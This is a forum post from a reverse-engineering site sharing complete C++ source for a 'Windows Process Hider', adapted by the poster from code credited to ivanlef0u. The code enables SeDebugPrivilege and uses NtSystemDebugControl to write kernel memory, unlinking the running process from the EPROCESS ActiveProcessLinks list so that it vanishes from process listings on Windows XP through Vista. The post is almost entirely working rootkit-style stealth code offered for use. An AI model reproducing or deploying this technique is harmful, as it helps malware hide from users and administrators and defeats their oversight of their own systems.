Jump to content
View in the app

A better way to browse. Learn more.
Tuts 4 You

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

Windows Process Hider

JMC31337
JMC31337
in Malware Reverse Engineering

Featured Replies

Posted

in no way is this my code at all:


simply added/modify 2 lines to make it work correctly for Dev-C++


 


1) LONG (NTAPI *NtSystemDebugControl)(int,void*,DWORD,void*,DWORD,DWORD*);


2) *(DWORD*)&NtSystemDebugControl =(DWORD)GetProcAddress(LoadLibrary("ntdll"),"NtSystemDebugControl");




#define WIN32_LEAN_AND_MEAN

#include <windows.h>

#include <stdio.h>

#include <shlwapi.h>

#include <iostream>

using namespace std;

typedef LONG NTSTATUS;
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)

//ivanlef0u's code

//xp sp2 ntoskrnl 5.1.2600, les chiffre indiquent la taille de la struct à passer en argument

typedef enum _DEBUG_CONTROL_CODE {

    DebugSysGetTraceInformation=1,

    DebugSysSetInternalBreakpoint, //0x38

    DebugSysSetSpecialCall, //0x4

    DebugSysClerSpecialCalls,  //no args kill all special calls

    DebugSysQuerySpecialCalls, 

    DebugSysBreakpointWithStatus,

    DebugSysGetVersion, //0x28
    //sources de reactos écrit par notre alex ionescu préféré ntexapi.h

    DebugSysReadVirtual = 8, //0x10

    DebugSysWriteVirtual = 9,

    DebugSysReadPhysical = 10,

    DebugSysWritePhysical = 11,
    DebugSysReadControlSpace=12, //0x18

    DebugSysWriteControlSpace, //0x18

    DebugSysReadIoSpace, //0x20

    DebugSysSysWriteIoSpace, //0x20

    DebugSysReadMsr, //0x10

    DebugSysWriteMsr, //0x10

    DebugSysReadBusData, //0x18

    DebugSysWriteBusData, //0x18

    DebugSysCheckLowMemory, 

} DEBUG_CONTROL_CODE;
typedef struct _SYSDBG_VIRTUAL {

    PVOID Address;

    PVOID Buffer;

    ULONG Request;

} SYSDBG_VIRTUAL, *PSYSDBG_VIRTUAL;
extern "C"

__declspec(dllimport) 

ULONG

__stdcall

RtlNtStatusToDosError(

  NTSTATUS Status

); 
#define PKPCR 0xffdff000 // <=> fs:[0] in KeLand
//FUNCTIONS:

LONG (NTAPI *NtSystemDebugControl)(int,void*,DWORD,void*,DWORD,DWORD*);

//Check OS and get the right Offset:

int CheckOSVersion( int &Offset )

{

    //xWeasel's Code for checking OS's and setting the right Offset
    OSVERSIONINFO osvi;
    ZeroMemory(&osvi, sizeof(OSVERSIONINFO));

    osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);

    GetVersionEx(&osvi);

    if(osvi.dwPlatformId == VER_PLATFORM_WIN32_NT && osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 1)

    {

        Offset = 0x88; //WinXP
        return 1;

    }

    else if(osvi.dwPlatformId == VER_PLATFORM_WIN32_NT && osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 0)

    {

        Offset = 0xA0; //Win2000

        return 1;

    }

    else if(osvi.dwPlatformId == VER_PLATFORM_WIN32_NT && osvi.dwMajorVersion == 6 && osvi.dwMinorVersion == 0)

    {

        Offset = 0xA0; //VISTA

        return 1;

    }

    else

    {

        return 0;

    }

    return 0;

}
ULONG EnablePrivilege(char *Privilege)

{

    HANDLE hToken;

    ULONG Ret=1;

    TOKEN_PRIVILEGES TP;

    LUID Luid;
    if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))

    {

        Ret=0;

        goto bye;    

    } 
    if(!LookupPrivilegeValue(NULL, Privilege, &TP.Privileges[0].Luid))

    {

        Ret=0;

        goto bye;    
    }
    TP.PrivilegeCount=1;

    TP.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
    if(!AdjustTokenPrivileges(hToken,

                            false,

                            &TP,

                            NULL,

                            NULL,

                            NULL))

    {

        Ret=0;

        goto bye;    
    }
    bye:

    CloseHandle(hToken);
    return Ret;    

}
int HideCurrentProcess( int Offset )

{

*(DWORD*)&NtSystemDebugControl =(DWORD)GetProcAddress(LoadLibrary("ntdll"),"NtSystemDebugControl");

    ULONG Status, Addr, PrevEPROCESS, NextEPROCESS;

    SYSDBG_VIRTUAL Mem;
    if(!EnablePrivilege("SeDebugPrivilege"))

    {    

        return 0;

    }
    /**************** CURRENT ETHREAD ****************/

    Mem.Address=(PVOID)(PKPCR+0x124); //KPRRCB-> +0x004 CurrentThread    : Ptr32 _KTHREAD

    Mem.Buffer=&Addr;

    Mem.Request=sizeof(ULONG);
    Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);

    if(Status!=STATUS_SUCCESS)

    {    

        return 0;

    }
    /**************** CURRENT EPROCESS ****************/

    Mem.Address=(PVOID)(Addr+0x220); //ETHREAD-> +0x220 ThreadsProcess : Ptr32 _EPROCESS

    Mem.Buffer=&Addr;

    Mem.Request=sizeof(ULONG);
    Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);

    if(Status!=STATUS_SUCCESS)

    {        

        return 0;

    }
    /**************** PREV EPROCESS ****************/

    Mem.Address=(PVOID)(Addr+0x8C); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY

    Mem.Buffer=&PrevEPROCESS;

    Mem.Request=sizeof(ULONG);
    Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);

    if(Status!=STATUS_SUCCESS)

    {        

        return 0;

    }
    /**************** NEXT EPROCESS ****************/

    Mem.Address=(PVOID)(Addr+Offset); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY

    Mem.Buffer=&NextEPROCESS;

    Mem.Request=sizeof(ULONG);
    Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);

    if(Status!=STATUS_SUCCESS)

    {        

        return 0;

    }
    /**************** PREV EPROCESS TO NEXT EPROCESS ****************/

    Mem.Address=(PVOID)(PrevEPROCESS); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY

    Mem.Buffer=&NextEPROCESS;

    Mem.Request=sizeof(ULONG);
    Status=NtSystemDebugControl(DebugSysWriteVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);

    if(Status!=STATUS_SUCCESS)

    {        

        return 0;

    }
    /**************** NEXT EPROCESS TO PREV EPROCESS ****************/

    Mem.Address=(PVOID)(NextEPROCESS+0x4); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY

    Mem.Buffer=&PrevEPROCESS;

    Mem.Request=sizeof(ULONG);
    Status=NtSystemDebugControl(DebugSysWriteVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);

    if(Status!=STATUS_SUCCESS)

    {        

        return 0;

    }
    return 1; //SUCCED Stuff is hidden!!

}
//MAIN FUNCTION
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)    

{

    MessageBox(NULL,"Starting Main Function","Welcome",MB_OK);//DEBUG
    int Offset;
    if ( CheckOSVersion(Offset) == 1)

    {

        HideCurrentProcess(Offset);//OK to hide

        MessageBox(NULL,"Check if I'm hidden now!! Press OK to exit","FOUND!",MB_OK); //DEBUG
    }
    return 0;

}

the original idea was by a bad @ss hacker ivanlef0u 


http://www.ivanlef0u.tuxfamily.org/


 


--Currently works under SP3


Edited by JMC31337

    • Like 2

    Create an account or sign in to comment

    Go to topic listing

    Configure browser push notifications
    Chrome (Android)
    1. Tap the lock icon next to the address bar.
    2. Tap Permissions → Notifications.
    3. Adjust your preference.
    Chrome (Desktop)
    1. Click the padlock icon in the address bar.
    2. Select Site settings.
    3. Find Notifications and adjust your preference.